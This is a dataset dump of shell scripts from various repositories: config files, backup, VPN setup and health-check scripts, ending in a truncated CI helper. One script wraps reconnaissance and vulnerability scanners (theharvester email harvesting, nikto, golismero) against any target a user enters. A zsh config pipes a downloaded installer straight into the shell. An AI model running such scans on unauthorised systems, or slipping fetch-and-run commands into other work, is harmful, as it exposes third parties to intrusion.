blob_id stringlengths 40 40 | language stringclasses 1 value | repo_name stringlengths 4 115 | path stringlengths 2 970 | src_encoding stringclasses 28 values | length_bytes int64 31 5.38M | score float64 2.52 5.28 | int_score int64 3 5 | detected_licenses listlengths 0 161 | license_type stringclasses 2 values | text stringlengths 31 5.39M | download_success bool 1 class |
|---|---|---|---|---|---|---|---|---|---|---|---|
91b74e3005af11dd0213644d0bdaa4021d11d7a9 | Shell | HumanBrainProject/kg-spatial-search-docker | /bin/create-db.sh | UTF-8 | 521 | 3.453125 | 3 | [] | no_license | #!/bin/sh
: ${SPATIAL_SEARCH_HOME:="${PWD}"}
. ${SPATIAL_SEARCH_HOME}/settings.sh
if [ -z $1 ]
then
echo "Missing core name."
fi
core=$1
shift
if [ ! -z $1 ]
then
data="-f $1"
shift
fi
# 1. Create the core
if [ ! -d ${KG_SPATIAL_SEARCH_DATA}/${core} ]
then
sudo cp -r ${KG_SPATIAL_SEARCH_DATA_DEFAULTS} ${KG_SPATIAL_SEARCH_DATA}/${core}
sudo chown -R 8983:8983 ${KG_SPATIAL_SEARCH_DATA}
fi
# 2. Register the Spatial types and fields
${PYTHON_ROOT}/register.py -u ${KG_SPATIAL_SEARCH_URL} -c ${core} ${data} $@
| true |
455bd4a89f65bcab21021ca602fe510b9bb08311 | Shell | Hansel-Christopher/LAMP-script | /backup.sh | UTF-8 | 427 | 3.359375 | 3 | [] | no_license | #!/bin/bash
FILE=backup.sql.`date +"%Y%m%d"`
USER=${DB_USER}
# (2) in case you run this more than once a day, remove the previous version of the file
# unalias rm 2> /dev/null
# rm ${FILE} 2> /dev/null
# rm ${FILE}.gz 2> /dev/null
sudo mkdir -p /opt/backups/
mysqldump --opt --user=root --password ${DATABASE} > ${FILE}
mv ${FILE} /opt/backups/
gzip $FILE
echo "${FILE}.gz was created:"
ls -l ${FILE}.gz | true |
5e965630dfad0d50c8b3c964cbc58fb0ac4dbe37 | Shell | deejaydarvin/config | /home/.zshrc | UTF-8 | 1,140 | 2.703125 | 3 | [] | no_license | #
# Options
#
fpath=(/usr/local/share/zsh-completions $fpath)
LOAD_MODULES=(
"setup"
"autocompletion"
"history"
"vim-foreground"
"vimtricks"
"zman"
"autopushd"
"homeshick"
"task"
"fasd"
"fzf"
)
# OS Specific choices...
if [[ `uname` == "Darwin" ]]; then
# OPAM configuration
source /Users/robert/.opam/opam-init/init.zsh
eval "$(/opt/homebrew/bin/brew shellenv)"
else
LOAD_MODULES+=( "notify")
fi
source ~/.zplug/init.zsh
zplug 'zplug/zplug', hook-build:'zplug --self-manage'
zplug "mafredri/zsh-async"
zplug "zsh-users/zsh-syntax-highlighting"
zplug "sindresorhus/pure", use:pure.zsh, from:github, as:theme
zplug "wookayin/fzf-fasd"
# Install plugins if there are plugins that have not been installed
if ! zplug check --verbose; then
printf "Install? [y/N]: "
if read -q; then
echo; zplug install
fi
fi
zplug load # --verbose # for more details
#### Do not change anything after this file
[ -r /etc/profile.d/cnf.sh ] && . /etc/profile.d/cnf.sh
for module in $LOAD_MODULES; do
source "$HOME/.zsh/functions/"$module
done
# vim:set path=~/.zsh/functions/
| true |
1cafab164be2a86e0556a8dc99ac417d446ce797 | Shell | JiriHusak-lab/POC-T-REF-OCPAUTO | /wmj.sh | UTF-8 | 277 | 2.71875 | 3 | [] | no_license | #!/bin/bash
if [ $# -ne 1 ]
then
echo wmj.sh json-file-name
exit -1
fi
JSON_FILE=$1
TOPIC_NAME=warehouse-movement
APACHE_KAFKA=apache-kafka
cat /opt/kafka/${JSON_FILE} | bin/kafka-console-producer.sh --broker-list ${APACHE_KAFKA}:9092 --topic ${TOPIC_NAME}
| true |
374ef0b05f3c77d06225be1d80f99e6284f8a76c | Shell | Peregrine42/elk-mini-pingu | /pinga/muxxer.sh | UTF-8 | 121 | 2.875 | 3 | [] | no_license | for target in $(./receiver.sh $2); do
arguments=`echo $target | sed "s/|/ /g"`
./sender.sh $1 $arguments &
done
wait | true |
4cf173d3124dc134af1d9885e240cb2f7e31ce61 | Shell | svn2github/open64 | /opencti/trunk/bin/inview.sh | UTF-8 | 1,285 | 3.140625 | 3 | [] | no_license | #!/bin/sh
# ====================================================================
#
# Copyright (C) 2011, Hewlett-Packard Development Company, L.P.
# All Rights Reserved.
#
# Open64 is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# Open64 is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301, USA.
#
# ====================================================================
if [[ -z "$2" ]]; then
echo " Usage: inview view-tag command args ..."
exit 1
fi
# get the specified view name
VIEW=$1
shift
# get current view name, if any
CT=/usr/eclipse/bin/cleartool
INVIEW=$(basename $CLEARCASE_ROOT)
if [[ "$VIEW" = "$INVIEW" ]]; then
$@
RET=$?
else
$CT setview -exec "$*" $VIEW
RET=$?
fi
exit $RET
| true |
770171cec341b1828eb5e40763ab01407425ba10 | Shell | cory011202/plexscripts | /serverHealthCheck.sh | UTF-8 | 518 | 3.25 | 3 | [] | no_license | #!/bin/bash
#ping server and check if it is alive. If not send email and wol command.
SERVER=xxx.xxx.xxx.xxx
MACADDRESS=xx:xx:xx:xx:xx:xx
#echo $SERVER
if ping -c 10 $SERVER >/dev/null
then
echo `date` " -- Its Alive">> /scripts/serverHealth.log
else
echo `date` " -- Server is down. Trying to start" | mail -s "Server IS DOWN" user@mail.com
echo `date` " -- Sent email as server is down" >> /scripts/serverHealth.log
# echo "Waking up $SERVER"
/usr/bin/wakeonlan $MACADDRESS
fi
| true |
d1448d08e2e08c4aee95f2cd0afb0c2870655152 | Shell | nelsonmorais/azure-iot | /colors.azcli | UTF-8 | 168 | 2.65625 | 3 | [] | no_license | #!/bin/bash
# Define a set of colors to be used on the bash echo
reset="\e[0m"
red="\e[31m"
green="\e[32m"
yellow="\e[33m"
blue="\e[34m"
magenta="\e[35m"
cyan="\e[36m" | true |
6fbaa5f79cce1f37c4bbc85d765d236f03fc54ff | Shell | 5l1v3r1/faculdade | /giveme10.sh | UTF-8 | 6,293 | 3.53125 | 4 | [] | no_license | #!/bin/bash
#
# Luis Fernando
#
# pwx - jonatas fil
# CONFIG
Colors() {
Escape="\033";
white="${Escape}[0m";
RedF="${Escape}[31m";
GreenF="${Escape}[32m";
YellowF="${Escape}[33m";
BlueF="${Escape}[34m";
CyanF="${Escape}[36m";
Reset="${Escape}[0m";
}
#
#
# INSTALL
#
#
/usr/bin/notify-send -t 5000 "Aguarde..."
# check if whois installation exists
clear
if [ -d $find ]; then
Colors;
echo [*][whois]:installation found!;
else
Colors;
echo ${RedF}[x]:[warning]:this script require whois installed to work ${Reset};
echo ${GreenF}[!]${RedF}:${GreenF}[please wait]: Downloading from network... ${Reset};
sleep 3
apt-get install whois
fi
sleep 1
clear
# check if dnsenum installation exists
if [ -d $find ]; then
Colors;
echo [*]:[dnsrecon]:installation found!;
else
Colors;
echo ${RedF}[x]:[warning]:this script require dnsrecon installed to work ${Reset};
echo ${GreenF}[!]${RedF}:${GreenF}[please wait]: Downloading from network... ${Reset};
sleep 3
apt-get install dnsrecon
fi
sleep 1
clear
# check if theharvester installation exists
if [ -d $find ]; then
Colors;
echo [*][theharvester]:installation found!;
else
Colors;
echo ${RedF}[x]:[warning]:this script require theharvester installed to work ${Reset};
echo ${GreenF}[!]${RedF}:${GreenF}[please wait]: Downloading from network... ${Reset};
sleep 3
apt-get install theharvester
fi
sleep 1
clear
# check if golismero installation exists
if [ -d $find ]; then
Colors;
echo [*]:[golismero]:installation found!;
else
Colors;
echo ${RedF}[x]:[warning]:this script require golismero installed to work ${Reset};
echo ${GreenF}[!]${RedF}:${GreenF}[please wait]: Downloading from network... ${Reset};
sleep 3
apt-get install golismero
fi
sleep 1
clear
# check if nikto installation exists
if [ -d $find ]; then
Colors;
echo [*]:[nikto]:installation found!;
else
Colors;
echo ${RedF}[x]:[warning]:this script require nikto installed to work ${Reset};
echo ${GreenF}[!]${RedF}:${GreenF}[please wait]: Downloading from network... ${Reset};
sleep 3
apt-get install nikto
fi
sleep 1
clear
# MENU
Colors;
Principal () {
/usr/bin/notify-send -t 5000 "Bem vindo !"
cat <<!
G I V E M E 1 0
---------------------------#
1) - Verificar IP Externo #
2) - Verificar Data/horas #
3) - Whois em Dominio #
4) - Analise em DNS #
5) - Searching Emails #
6) - Scan Vuln [golismero] #
7) - Scan Vuln [Nikto] #
e) - Sair #
---------------------------#
!
echo -n "Qual a opção desejada ? "
read opcao
case $opcao in
1) sh_ext ;;
2) sh_data ;;
3) sh_whois ;;
4) sh_dns ;;
5) sh_email ;;
6) sh_goli ;;
7) sh_nikto ;;
e) sh_sair ;;
*) echo "\"$opcao\" Opção inválida!"; sleep 2; Principal ;;
esac
}
# IP EXTERNO
Colors;
sh_ext () {
Colors;
clear
echo [Aguarde, verificando seu ip externo...];
sleep 3
curl ifconfig.me
/usr/bin/notify-send -t 5000 "verificação de ip externo [OK]"
sleep 2
echo -n "Deseja voltar para o menu de Opções ? (yes):"
read yes
clear
sh_Principal
}
# DATA
Colors;
sh_data () {
Colors;
clear
echo [Aguarde, verificando as horas e a data de hoje...];
sleep 3
clear
/usr/bin/notify-send -t 5000 "verificação de Data e horario [OK]"
echo "Data/horario de hoje: "
date
sleep 2
echo -n "Deseja voltar para o menu de Opções ? (yes):"
read yes
clear
sh_Principal
}
# WHOIS
Colors;
sh_whois () {
Colors;
clear
echo [Aguarde, o Whois está sendo preparado...];
sleep 3
clear
/usr/bin/notify-send -t 5000 "Inicialização do whois [OK]"
echo -n "Digite o dominio :"
read domin
whois $domin
sleep 2
echo -n "Deseja voltar para o menu de Opções? (yes):"
read yes
clear
sh_Principal
}
# DNS
Colors;
sh_dns () {
Colors;
clear
echo [Aguarde, o dnsrecon está sendo preparado...];
sleep 3
clear
/usr/bin/notify-send -t 5000 "Inicialização do dnsrecon [OK]"
echo -n "Digite o dominio :"
read dominio
echo -n "Digite o nome do arquivo output [.xml]: [output.xml]"
read output
dnsrecon -d $dominio --xml $output
sleep 2
echo "O relatorio está salvo no arquivo do output...[$output]"
sleep 2
echo -n "Deseja voltar para o menu de Opções? (yes):"
read yes
clear
sh_Principal
}
# EMAIL
Colors;
sh_email () {
Colors;
clear
echo [Aguarde, o theharvester está sendo preparado...];
sleep 3
clear
/usr/bin/notify-send -t 5000 "Inicialização do theharvester [OK]"
echo -n "Digite o dominio :"
read domi
echo -n "Digite o nome do arquivo output: [output.txt]"
read output
theharvester -d $domi -l 500 -b all -f $output
sleep 2
echo "O relatorio está salvo no arquivo do output...[$output]"
sleep 2
echo -n "Deseja voltar para o menu de Opções? (yes):"
read yes
clear
sh_Principal
}
# golismero
Colors;
sh_goli () {
Colors;
clear
echo [Aguarde, o golismero está sendo preparado...];
sleep 3
clear
/usr/bin/notify-send -t 5000 "Inicialização do golismero [OK]"
echo -n "Digite o alvo :"
read alvo
echo -n "Digite o nome do arquivo output: [output.txt]"
read output
golismero scan $alvo -o $output
sleep 2
echo "O relatorio está salvo no arquivo do output...[$output]"
sleep 2
echo -n "Deseja voltar para o menu de Opções? (yes):"
read yes
clear
sh_Principal
}
# nikto
Colors;
sh_nikto () {
Colors;
clear
echo [Aguarde, o nikto está sendo preparado...];
sleep 3
clear
/usr/bin/notify-send -t 5000 "Inicialização do nikto [OK]"
echo -n "Digite o alvo :"
read alvo
echo -n "Digite o nome do arquivo output: [output.txt]"
read output
nikto -h $alvo » $output
sleep 2
echo "O relatorio está salvo no arquivo do output...[$output]"
sleep 2
echo -n "Deseja voltar para o menu de Opções? (yes):"
read yes
clear
sh_Principal
}
# SAIR
sh_sair () {
clear
echo "Saindo..."
/usr/bin/notify-send -t 5000 "Saindo do script..."
sleep 2
clear
exit
}
Principal
| true |
1aed21cd3fb2ddea91d99816bf82033d275f7ed1 | Shell | mewin-archived/ROSChroot | /run_bash.sh | UTF-8 | 305 | 2.984375 | 3 | [
"WTFPL"
] | permissive | #!/bin/bash
source _common.sh
if [ `id -u` -ne 0 ] ; then
sudo bash "$0" "$HOME/.Xauthority"
exit
fi
if [ -n "$1" ] ; then
cp "$1" "$CHROOT_ROOT/home/$CHROOT_USER/.Xauthority"
fi
xhost +
source _chroot_prelude.sh
chroot "$CHROOT_ROOT" sudo -u $CHROOT_USER /bin/bash
source _chroot_epilogue.sh
| true |
496ee7bb5bfb742726f1e6bcd6af642535ceaac4 | Shell | jkugelman/dotfiles | /.zshrc | UTF-8 | 8,564 | 3.546875 | 4 | [] | no_license | if ! [[ -d ~/.zplug ]]; then
printf 'Install zplug? [y/N]: '
read -q || return
echo
curl -sL --proto-redir -all,https https://raw.githubusercontent.com/zplug/installer/master/installer.zsh | zsh
sleep 1 # Why is this needed? Without it, init.zsh is missing on Raspberry Pi.
echo
fi
# Enable Powerlevel10k instant prompt. Should stay close to the top of ~/.zshrc.
# Initialization code that may require console input (password prompts, [y/n]
# confirmations, etc.) must go above this block; everything else may go below.
if [[ -r "${XDG_CACHE_HOME:-$HOME/.cache}/p10k-instant-prompt-${(%):-%n}.zsh" ]]; then
source "${XDG_CACHE_HOME:-$HOME/.cache}/p10k-instant-prompt-${(%):-%n}.zsh"
fi
source ~/.zplug/init.zsh
# Use emacs keybindings even if our EDITOR is set to vi. Need to set this early.
bindkey -e
# Automatically cd to my favorite directories.
setopt auto_cd
cdpath=(
~/
)
# Customize completion.
setopt auto_list list_packed
autoload -U compinit
zstyle ':completion:*' menu select=2
zmodload zsh/complist
compinit
_comp_options+=(globdots) # Include hidden files.
# Set window title.
# Based on <https://github.com/mdarocha/zsh-windows-title>
case $TERM in
xterm*|termite)
precmd () {
dir=${PWD/#$HOME/'~'}
command=$(history | tail -n1 | awk '{for (i=2;i<=NF-1;i++) printf $i " "; print $NF}')
print -Pn "\e]0;$dir ❯ $command\a"
}
;;
esac
# Shell theme. Same Powerlevel9k just faster.
zplug 'romkatv/powerlevel10k', as:theme, if:'[[ $TERM == *256* ]]'
# This plugin enables directory navigation similar to using back and forward on
# browsers or common file explorers like Finder or Nautilus. It uses a small zle
# trick that lets you cycle through your directory stack left or right using
# Ctrl + Shift + Left / Right. This is useful when moving back and forth between
# directories in development environments, and can be thought of as kind of a
# nondestructive pushd/popd.
zplug 'plugins/dircycle', from:oh-my-zsh
bindkey '^[[1;3D' insert-cycledleft # Alt-Left
bindkey '^[[1;3C' insert-cycledright # Alt-Right
setopt auto_pushd pushd_ignore_dups
# Press Alt-Up to go up a directory, Alt-Down to go back down.
_chdir-parent() {
cd ..
_chdir-reset-prompt
}
_chdir-descendant() {
[[ "${dirstack[1]}" == "$PWD"/* ]] && popd >/dev/null
_chdir-reset-prompt
}
_chdir-reset-prompt() {
local fn
for fn (chpwd $chpwd_functions precmd $precmd_functions); do
(( $+functions[$fn] )) && $fn
done
zle reset-prompt
}
zle -N _chdir-parent
zle -N _chdir-descendant
bindkey '^[[1;3A' _chdir-parent # Alt-Up
bindkey '^[[1;3B' _chdir-descendant # Alt-Down
# * ccat <file> [files]: colorize the contents of the file (or files, if more
# than one are provided). If no arguments are passed it will colorize the
# standard input or stdin.
#
# * cless <file> [files]: colorize the contents of the file (or files, if more
# than one are provided) and open less. If no arguments are passed it will
# colorize the standard input or stdin.
zplug 'plugins/colorize', from:oh-my-zsh
# Fish-like fast/unobtrusive autosuggestions for zsh. It suggests commands as
# you type based on history and completions.
zplug 'zsh-users/zsh-autosuggestions'
# This package provides syntax highlighting for the shell zsh. It enables
# highlighting of commands whilst they are typed at a zsh prompt into an
# interactive terminal. This helps in reviewing commands before running them,
# particularly in catching syntax errors.
zplug 'zsh-users/zsh-syntax-highlighting', defer:2
# This plugin starts automatically ssh-agent to set up and load whichever
# credentials you want for ssh connections.
zplug 'plugins/ssh-agent', from:oh-my-zsh
# If a command is not recognized in the $PATH, this will use Ubuntu's
# command-not-found package to find it or suggest spelling mistakes.
#
# Don't use this, it doesn't print an error if there's no suggestion:
# zplug 'plugins/command-not-found', from:oh-my-zsh
if [[ -x /usr/lib/command-not-found ]] ; then
if (( ! ${+functions[command_not_found_handler]} )) ; then
function command_not_found_handler {
[[ -x /usr/lib/command-not-found ]] || return 1
/usr/lib/command-not-found -- ${1+"$1"} && :
}
fi
fi
# Press Alt-S to run `git status`.
_zsh-git-status() { _zsh-run-command 'git status'; }
zle -N _zsh-git-status
bindkey '^[s' _zsh-git-status
# Press Alt-D to run `git diff`.
_zsh-git-diff() { _zsh-run-command 'git diff'; }
zle -N _zsh-git-diff
bindkey '^[d' _zsh-git-diff
# Press Alt-C to run `git diff --cached`.
_zsh-git-diff-cached() { _zsh-run-command 'git diff --cached'; }
zle -N _zsh-git-diff-cached
bindkey '^[c' _zsh-git-diff-cached
# Press Alt-L to run `git log`.
_zsh-git-log() { _zsh-run-command 'git lg'; }
zle -N _zsh-git-log
bindkey '^[l' _zsh-git-log
# Press Alt-R to reload the shell.
_zsh-reload-shell() { _zsh-run-command "$(printf 'exec %q' "$SHELL")"; }
zle -N _zsh-reload-shell
bindkey '^[r' _zsh-reload-shell
# Press Ctrl-Z to resume vi.
_zsh-resume-vi() { _zsh-run-command 'fg %vi'; }
zle -N _zsh-resume-vi
bindkey '^Z' _zsh-resume-vi
# Run a command if the user hasn't typed anything.
_zsh-run-command() {
[[ -z $BUFFER ]] || return 0
BUFFER=$1
zle accept-line
}
# Share history among sessions.
setopt hist_ignore_all_dups
#setopt share_history
# Keep 1000 lines of history within the shell and save it to ~/.zsh_history.
HISTSIZE=100000
SAVEHIST=100000
HISTFILE=~/.zsh_history
# Fix key bindings. From https://wiki.archlinux.org/title/Zsh#Key_bindings.
typeset -g -A key
key[Home]="${terminfo[khome]}"
key[End]="${terminfo[kend]}"
key[Insert]="${terminfo[kich1]}"
key[Backspace]="${terminfo[kbs]}"
key[Delete]="${terminfo[kdch1]}"
key[Up]="${terminfo[kcuu1]}"
key[Down]="${terminfo[kcud1]}"
key[Left]="${terminfo[kcub1]}"
key[Right]="${terminfo[kcuf1]}"
key[PageUp]="${terminfo[kpp]}"
key[PageDown]="${terminfo[knp]}"
key[Shift-Tab]="${terminfo[kcbt]}"
key[Ctrl-Left]="${terminfo[kLFT5]}"
key[Ctrl-Right]="${terminfo[kRIT5]}"
# TERM=screen-256color is missing these key entries.
[[ -z "${key[Ctrl-Left]}" ]] && key[Ctrl-Left]="$(tput -T xterm kLFT5)"
[[ -z "${key[Ctrl-Right]}" ]] && key[Ctrl-Right]="$(tput -T xterm kRIT5)"
[[ -n "${key[Home]}" ]] && bindkey -- "${key[Home]}" beginning-of-line
[[ -n "${key[End]}" ]] && bindkey -- "${key[End]}" end-of-line
[[ -n "${key[Insert]}" ]] && bindkey -- "${key[Insert]}" overwrite-mode
[[ -n "${key[Backspace]}" ]] && bindkey -- "${key[Backspace]}" backward-delete-char
[[ -n "${key[Delete]}" ]] && bindkey -- "${key[Delete]}" delete-char
[[ -n "${key[Up]}" ]] && bindkey -- "${key[Up]}" up-line-or-history
[[ -n "${key[Down]}" ]] && bindkey -- "${key[Down]}" down-line-or-history
[[ -n "${key[Left]}" ]] && bindkey -- "${key[Left]}" backward-char
[[ -n "${key[Right]}" ]] && bindkey -- "${key[Right]}" forward-char
[[ -n "${key[PageUp]}" ]] && bindkey -- "${key[PageUp]}" beginning-of-buffer-or-history
[[ -n "${key[PageDown]}" ]] && bindkey -- "${key[PageDown]}" end-of-buffer-or-history
[[ -n "${key[Shift-Tab]}" ]] && bindkey -- "${key[Shift-Tab]}" reverse-menu-complete
[[ -n "${key[Ctrl-Left]}" ]] && bindkey -- "${key[Ctrl-Left]}" backward-word
[[ -n "${key[Ctrl-Right]}" ]] && bindkey -- "${key[Ctrl-Right]}" forward-word
# VSCode needs extra bindings for Home and End.
bindkey -- $'\e[H' beginning-of-line
bindkey -- $'\e[F' end-of-line
# Add to PATH. Don't allow duplicates.
typeset -U path
path=(~/.local/bin ~/bin $path)
# Alias to make working with .dotfiles easier.
dotfiles() {
git --git-dir="$HOME"/.dotfiles --work-tree="$HOME" "$@"
}
# Install plugins if there are plugins that have not been installed.
if ! zplug check --verbose; then
printf "Install plugins? [y/N]: "
if read -q; then
echo; zplug install
fi
fi
# Then, source plugins and add commands to $PATH.
zplug load
# Customize plugins/screen status line. Have to do this after it's loaded.
TAB_TITLE_PREFIX='"`'$_GET_PATH' | sed "s:..*/::"`$PROMPT_CHAR"'
TAB_TITLE_PROMPT=''
# To customize prompt, run `p10k configure` or edit ~/.p10k.zsh.
[[ ! -f ~/.p10k.zsh ]] || source ~/.p10k.zsh
# Source functions/aliases shared with other shells.
[[ ! -f ~/.config/common.shrc ]] || source ~/.config/common.shrc
# Source local customizations.
[[ ! -f ~/.config/local.zshrc ]] || source ~/.config/local.zshrc
| true |
665d8753f83f2269e577005a6fd11bbfe30e62b0 | Shell | JakduK/friendly-gamnamu | /open-vpn/install-open-vpn.sh | UTF-8 | 3,008 | 3.203125 | 3 | [
"MIT"
] | permissive | #!/bin/bash
# CentOS 7 에서 OpenVPN 설치를 위한 스크립트
# 스크립트 얻는법 : wget https://raw.githubusercontent.com/JakduK/friendly-gamnamu/master/open-vpn/install-open-vpn.sh
# 문서 참고
# https://www.digitalocean.com/community/tutorials/how-to-set-up-and-configure-an-openvpn-server-on-centos-7
# https://phoenixnap.com/kb/openvpn-centos
# https://github.com/OpenVPN/easy-rsa/
echo "* Update the CentOS repositories and packages. *"
yum update -y
echo "* Enable the EPEL repository. *"
yum install epel-release -y
echo "* Again update the CentOS repositories and packages. *"
yum update -y
echo "* Install OpenVPN. *"
yum install -y openvpn
echo "* Download Easy RSA latest version. *"
wget https://github.com/OpenVPN/easy-rsa/archive/v3.1.0.tar.gz
tar -xf v3.1.0.tar.gz
rm -f v3.1.0.tar.gz
mv easy-rsa-3.1.0 /etc/openvpn/easy-rsa
echo "* Setup server.conf file. *"
OPEN_VPN_CONF_DIR=/etc/openvpn
if [ ! -f $OPEN_VPN_CONF_DIR/server.conf ]; then
wget https://raw.githubusercontent.com/JakduK/friendly-gamnamu/master/open-vpn/server.conf -P $OPEN_VPN_CONF_DIR
else
echo "WARN : OpenVPN server.conf file already exists"
fi
echo "* Setup vars file. *"
if [ ! -f $OPEN_VPN_CONF_DIR/easy-rsa/easyrsa3 ]; then
wget https://raw.githubusercontent.com/JakduK/friendly-gamnamu/master/open-vpn/vars -P $OPEN_VPN_CONF_DIR/easy-rsa/easyrsa3
else
echo "WARN : OpenVPN vars file already exists"
fi
echo "* Create key for HMAC firewall *"
openvpn --genkey --secret /etc/openvpn/myvpn.tlsauth
echo "* Building the certificate authority. *"
cd /etc/openvpn/easy-rsa/easyrsa3
./easyrsa clean-all
rm -f /etc/openvpn/easy-rsa/easyrsa3/pki/vars
# CA 는 직접 입력 필요 e.g. openvpn.jakduk.dev
./easyrsa build-ca nopass
echo "* Create a key and certificate for the server. *"
# PEM pass phrase는 직접 입력 필요
./easyrsa build-server-full server nopass
echo "* Generate a Diffie-Hellman key exchange file. *"
./easyrsa gen-dh
echo "* Create a certificate and key for client1. *"
# /etc/openvpn/easy-rsa/easyrsa3 디렉터리에서 실행해야 함
# PEM pass phrase는 직접 입력 필요
./easyrsa build-client-full client1
echo "* Copy key and certificate files to /etc/openvpn *"
cp /etc/openvpn/easy-rsa/easyrsa3/pki/ca.crt /etc/openvpn/easy-rsa/easyrsa3/pki/dh.pem /etc/openvpn
cp /etc/openvpn/easy-rsa/easyrsa3/pki/issued/server.crt /etc/openvpn/easy-rsa/easyrsa3/pki/dh.pem /etc/openvpn
cp /etc/openvpn/easy-rsa/easyrsa3/pki/private/ca.key /etc/openvpn/easy-rsa/easyrsa3/pki/private/server.key /etc/openvpn
echo "* Modify Firewall *"
firewall-cmd --zone=public --add-service openvpn
firewall-cmd --zone=public --add-service openvpn --permanent
#firewall-cmd --add-masquerade
#firewall-cmd --add-masquerade --permanent
echo "* Enable OpenVPN *"
systemctl start openvpn@server.service
# systemd-tty-ask-password-agent 를 실행해서 비밀번호를 넣어야 한다.
# ./easyrsa build-server-full server nopass 로 하면 안해도 됨
# systemctl enable openvpn@server.service
| true |
398843abda377dceb4030a59392e378d0521c5af | Shell | pyhero/nagiosauto | /functions/sync_conf.sh | UTF-8 | 212 | 3.15625 | 3 | [] | no_license | #!/bin/bash
DIR=$(cd `dirname $0`;echo $PWD)
## source global variables.
funs="$DIR/xscripts/functions"
if [ ! -f $funs ];then
echo -e "\e[32m$funs\e[0m: not exist."
exit 6
else
source $funs
fi
sync_remote
| true |
efa754fd1a6d8bfbf9833275367deeed4e0406f3 | Shell | tuxcodejohn/toolfabrik | /scripts/findwin.sh | UTF-8 | 260 | 2.578125 | 3 | [] | no_license | #!/bin/bash
#me wants to be an awesom shortcut...
WIN=$( wmctrl -l | \
dmenu -i -l 32 -fn -*-fixed-*-*-normal--15-*-*-*-*-*-*-1 \
-nb black -nf green -sb red -sf green | \
awk -F' ' '{ print $1 }')
if [ $WIN ]
then
echo $WIN && wmctrl -i -a $WIN
fi
| true |
4458578212e39a031141d980b9cf1f05cb487e4b | Shell | yqqxyy/VHbb | /CxAODOperations_VHbb/scripts/testLocallyAsInCIPipeline.sh | UTF-8 | 4,751 | 3.640625 | 4 | [] | no_license | #!/usr/bin/env bash
[[ $- == *i* ]] && echo "Shell Interactive" || echo "Shell Not interactive"
if [[ $0 == "$BASH_SOURCE" ]]; then
echo "ERROR: I'm a script ($0) forcing you to source. Don't execute me!" >&2
exit 1
fi
# check the number of parameters, if not stop
if [ $# -ne 1 ]; then
cat <<EOF
Usage: $0 SAMPLE_INFO
Usage: $0 testLocallyAsInCIPipelineTasks.txt
Usage: $0 testLocallyAsInCIPipelineTasksReduced.txt
EOF
return 1
fi
SAMPLE_INFO=${1}
echo "SAMPLE_INFO=${SAMPLE_INFO}"
# set up the CxAOD if not set already
source ../source/CxAODOperations_VHbb/scripts/setupLocal.sh
if [ -z $WorkDir_DIR ]; then
echo "Environment variable WorkDir_DIR not set. Forgot to source the setup.sh?"
return 1
fi
DO_CREATE_FOR_SUBMITMAKER="0"
DO_CREATE_FOR_PILELINE="0"
DO_RUN_SUBMITMAKER="1"
STEM="none"
VTAG="none"
GRID="Higgs"
USE_PF="0"
USE_TCC="0"
LOG="none"
DO="1"
INPUT_FILE_NAME="${WorkDir_DIR}/data/CxAODOperations_VHbb/DxAOD/info/${SAMPLE_INFO}"
SAMPLE_STEM="/afs/cern.ch/work/v/vhbbframework/public/data/DxAOD"
OUTPUT_FILE_NAME_SUBMITMAKER="${WorkDir_DIR}/../../source/CxAODOperations_VHbb/data/DxAOD/info/forSubmitMakerTasks.txt"
OUTPUT_FILE_NAME_PIPELINE="${WorkDir_DIR}/../../source/CxAODOperations_VHbb/data/DxAOD/info/forCIPipelineTasks.txt"
echo "INPUT_FILE_NAME=${INPUT_FILE_NAME}"
echo "SAMPLE_STEM=${SAMPLE_STEM}"
echo "OUTPUT_FILE_NAME_SUBMITMAKER=${OUTPUT_FILE_NAME_SUBMITMAKER}"
echo "OUTPUT_FILE_NAME_PIPELINE=${OUTPUT_FILE_NAME_PIPELINE}"
if [[ ${DO_CREATE_FOR_SUBMITMAKER} == "1" ]]; then
rm -f ${OUTPUT_FILE_NAME_SUBMITMAKER}
fi
if [[ ${DO_CREATE_FOR_PIPELINE} == "1" ]]; then
rm -f ${OUTPUT_FILE_NAME_PIPELINE}
fi
ACTIONS=()
# start loop over CxAODFramework packages
COUNTER=0
while read line
do
# skip coments and blank lines
QUOTE_RE="^#"
EMPTY_RE="^$"
if [[ $line =~ $QUOTE_RE || $line =~ $EMPTY_RE ]] ; then
continue
fi
#
COUNTER=$((COUNTER+1))
echo "COUNTER=${COUNTER}"
#
SAMPLE_SHORT=$(echo "$line" | awk '{print $1}')
CHANNEL=$(echo "$line" | awk '{print $2}')
PERIOD=$(echo "$line" | awk '{print $3}')
DERIV=$(echo "$line" | awk '{print $4}')
NR_EVENTS=$(echo "$line" | awk '{print $5}')
SAMPLE_LONG=$(echo "$line" | awk '{print $6}')
#
echo ""
echo "SAMPLE_SHORT=${SAMPLE_SHORT} CHANNEL=${CHANNEL} PERIOD=${PERIOD} DERIV=${DERIV} NR_EVENTS=${NR_EVENTS} SAMPLE_LONG=${SAMPLE_LONG}"
LOCAL_SAMPLE="${SAMPLE_STEM}/${SAMPLE_LONG}"
SUBMITDIR="${FOLDER_SUBMITDIR}/${SAMPLE_SHORT}"
LOGFILE="${FOLDER_LOGFILE}/${SAMPLE_SHORT}.log"
CONFIGFILE="${FOLDER_CONFIGFILE}/${SAMPLE_SHORT}.cfg"
LOG_FILE="${SAMPLE_SHORT}"
#
# create list of samples to run on in the pipeline
if [[ ${DO_CREATE_FOR_SUBMITMAKER} == "1" ]]; then
if [[ ${COUNTER} == "1" ]]; then
ACTIONS+=(" o Creating list of examples for submitMaker locally to copy/paste in submitMaker.sh.")
ACTIONS+=(" less ${OUTPUT_FILE_NAME_SUBMITMAKER}")
fi
LINES=()
LINES+=("Usage: source $0 ${CHANNEL} ${PERIOD} ${DERIV} ${STEM} ${VTAG} ${GRID} ${USE_PF} ${USE_TCC} ${NR_EVENTS} ${SAMPLE_STEM}/${SAMPLE_LONG} ${LOG} ${DO}")
for LINE in "${LINES[@]}"
do
echo "${LINE}" >> ${OUTPUT_FILE_NAME_SUBMITMAKER}
done
fi
# create list of samples to run on in the pipeline
if [[ ${DO_CREATE_FOR_PILELINE} == "1" ]]; then
